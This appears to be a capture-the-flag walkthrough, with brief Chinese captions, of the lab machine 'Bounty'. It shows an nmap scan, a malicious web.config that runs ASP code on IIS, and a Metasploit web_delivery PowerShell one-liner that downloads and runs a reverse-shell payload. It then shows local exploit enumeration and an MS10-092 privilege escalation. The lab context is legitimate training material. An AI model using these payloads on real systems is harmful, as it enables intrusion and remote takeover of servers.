$ nmap -A 10.10.10.93
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-30 10:20 CST
Nmap scan report for 10.10.10.93
Host is up (0.34s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012(92%)
<?xml version="1.0" encoding="UTF-8"?><configuration><system.webServer><handlersaccessPolicy="Read, Script, Write"><addname="web_config"path="*.config"verb="*"modules="IsapiModule"scriptProcessor="%windir%\system32\inetsrv\asp.dll"resourceType="Unspecified"requireAccess="Write"preCondition="bitness64"/></handlers><security><requestFiltering><fileExtensions><removefileExtension=".config"/></fileExtensions><hiddenSegments><removesegment="web.config"/></hiddenSegments></requestFiltering></security></system.webServer></configuration> ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
msf5 > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/script/web_delivery) > set SRVHOST 10.10.14.16
msf5 exploit(multi/script/web_delivery) > set SRVPORT 80msf5 exploit(multi/script/web_delivery) > set LHOST 10.10.14.16
msf5 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.16:4444
msf5 exploit(multi/script/web_delivery) > [*] Using URL: http://10.10.14.16:80/yXwrLG55ZN
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $C=new-object net.webclient;$C.proxy=[Net.WebRequest]::GetSystemWebProxy();$C.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $C.downloadstring('http://10.10.14.16/yXwrLG55ZN');[*] 10.10.10.93 web_delivery - Delivering Payload (2125) bytes
[*] Sending stage (206403 bytes) to 10.10.10.93
msf5 exploit(multi/script/web_delivery) > sessions -i 1[*] Starting interaction with 1...
meterpreter > shell
Microsoft Windows [Version 6.1.7600]
使用MSFweb_delivery模块生成powershell反弹链接,然后反弹。
本地漏洞枚举
1
2
3
4
5
6
7
8
9
10
11
12
13
C:\windows\system32\inetsrv>exit
exitmeterpreter > background
msf5 exploit(multi/script/web_delivery) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.93 - Collecting local exploits for x64/windows...
[*] 10.10.10.93 - 11 exploit checks are being tried...
[+] 10.10.10.93 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
获得以上漏洞。
搜索漏洞
1
2
3
4
5
6
7
8
msf5 post(multi/recon/local_exploit_suggester) > search ms10_092
Matching Modules================## Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- -----------
0 exploit/windows/local/ms10_092_schelevator 2010-09-13 excellent Yes Windows Escalate Task Scheduler XML Privilege Escalation
利用
1
2
3
4
5
6
7
8
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_092_schelevator
msf5 exploit(windows/local/ms10_092_schelevator) > set session 1msf5 exploit(windows/local/ms10_092_schelevator) > set LHOST 10.10.14.16
msf5 exploit(windows/local/ms10_092_schelevator) > set LPORT 4443LPORT=> 4443msf5 exploit(windows/local/ms10_092_schelevator) > run